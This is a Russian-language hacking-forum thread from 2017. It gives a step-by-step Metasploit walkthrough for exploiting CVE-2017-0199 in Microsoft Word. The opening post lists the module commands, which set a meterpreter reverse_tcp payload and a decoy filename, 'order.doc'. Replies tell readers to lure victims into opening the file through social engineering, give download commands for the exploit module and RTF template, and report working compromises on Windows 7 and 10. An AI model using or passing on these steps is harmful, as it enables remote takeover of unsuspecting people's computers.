 |
|

11.05.2017, 23:40
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
Привет всем! В этой статье я хочу показать, как можно получить активную сессию meterpreter, на удаленном хосте (Windows 8.1., Windows 7, Windows Server 2008) используя скрипт python который генерирует .rtf-файл для атаки. Все необходимое включено в Metasploit Framework.
Этот модуль создает вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.
OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.
OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.
Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.
Эта ошибка была изначально замечена в октябре 2016 года. Модуль был создан путем обращения вспять общедоступного образца вредоносной программы.
Начнем:
> use exploit/windows/fileformat/office_word_hta
> set srvhost 192.168.0.106
> set payload windows/meterpreter/reverse_tcp
> set filename order.doc
> set lhost 192.168.0.106
> exploit

Выделенная ссылка, на скриншоте ниже должна быть доставлена целевой хост:
Переход по ней и открытие скачанного файла, откроет активную сессию meterpreter:
> sysinfo

На этом все, спасибо за внимание.
|
|
|

12.05.2017, 20:36
|
|
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами:
4845950
Репутация:
0
|
|
CVlad сказал(а):
какие версии офиса подвержены данной уязвимости?
Уязвимость выстрелила как зеро-дэй. Речь шла о всех версиях. Так прошёл год )) Ждали от Майкрософта обновления с патчами.
11.04.2017 они действительно вышли и большей частью для МО 2016,2013,2010 г.
Но всё равно подозрительная тишина в отношении успеха.
Возможно ,пока к исчерпывающим ответам не готовы компании на рынке ИБ.
Кроме того, этого же числа , поддержка Win Vista должна быть прекращена по планам.
И это для поддерживаемых ОС,либо озадаченых обновлением пакета безопасности для МО.
|
|
|

12.05.2017, 22:05
|
|
Новичок
Регистрация: 04.03.2018
Сообщений: 2
С нами:
4313846
Репутация:
0
|
|
Oksy сказал(а):
Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать. Не кидайте тапками, только начинаю знакомство с эксплойтами и метасплойтом
да никто не кидает тапки)) ссылку доставь в контакте или еще как нить и убеди, что емц необходимо посмотреть этот документ)) короче изучай соц инженерию )
|
|
|

12.05.2017, 22:05
|
|
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами:
4845950
Репутация:
0
|
|
Oksy сказал(а):
Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать.
Вам надо воспользоваться поиском по форуму,задать теги meterpreter , metasploit .
Очень много отличных статей вышло от наших известных авторов.Быстро изучить не получится,т.к инструмент
огромен по функционалу. Ссылка, как вариант , прилагается к письму и отсылается с рассчётом на прочтение.
|
|
|

12.05.2017, 22:25
|
|
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами:
4963406
Репутация:
0
|
|
К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
качнуть код - под хайд
https://packetstormsecurity.com/files/142281/office_word_hta.rb.txt
Но это не все, что бы не получить ошибку:
Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf
качаем:
wget https://raw.githubusercontent.com/n...CVE-2017-0199/data/exploits/cve-2017-0199.rtf
стартуем, пробуем =)
ТС - респект за оперативный топик =)
|
|
|

12.05.2017, 22:36
|
|
Новичок
Регистрация: 04.03.2018
Сообщений: 2
С нами:
4313846
Репутация:
0
|
|
ghostphisher сказал(а):
К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
качнуть код - под хайд
***Скрытый текст***
ТС - респект за оперативный топик =)
Cпс ты как всегда спасаешь Parrot OS
|
|
|

12.05.2017, 23:12
|
|
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами:
4963406
Репутация:
0
|
|
Все работает
win7 SP1 Эннтерпрайз
|
|
|

13.05.2017, 01:06
|
|
Новичок
Регистрация: 04.03.2018
Сообщений: 2
С нами:
4313846
Репутация:
0
|
|
отлично прошлось по виндовс 10 при работающем авасте )) но при скачивании гугл Хром ругаеться, что фаил может быть плохой и навредит компу))
[doublepost=1494623166,1494620336][/doublepost]добавлю ) после открытия файла на вин10 ) на панели висит непонятный значек, который напрягает и привлекает внимание)
|
|
|

01.06.2017, 20:22
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
jaguar сказал(а):
Failed to load module: exploit/windows/fileformat/office_word_hta
msf > и как загрузить модуль?
А версия metasploit какая?
|
|
|

01.06.2017, 20:53
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
jaguar сказал(а):
metasploit v4.12.22-dev
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post
+ -- --=[ 455 payloads - 39 encoders - 8 nops
+ -- --=[ Free Metasploit Pro trial:
Стоит проапдейтить систему,
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|